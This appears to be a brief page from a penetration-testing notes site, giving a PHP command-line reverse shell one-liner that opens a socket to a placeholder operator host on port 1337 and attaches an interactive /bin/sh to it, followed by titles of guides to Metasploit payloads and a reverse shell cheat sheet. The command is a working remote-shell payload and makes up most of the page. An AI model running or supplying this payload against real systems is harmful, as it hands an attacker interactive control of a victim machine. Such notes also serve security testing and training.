Last updated 4 years ago
Was this helpful?
Php reverse shell on console
php -r '$sock=fsockopen("<YOUR OP>",1337);exec("/bin/sh -i <&3 >&3 2>&3");'
NetSec's Creating Metasploit Payloads:
Cybsploit's Creating payloads via metasploit
Creating a Reverse shell to remotely execute commands
Pentestmonkey's Reverse Shell Cheat Shewet: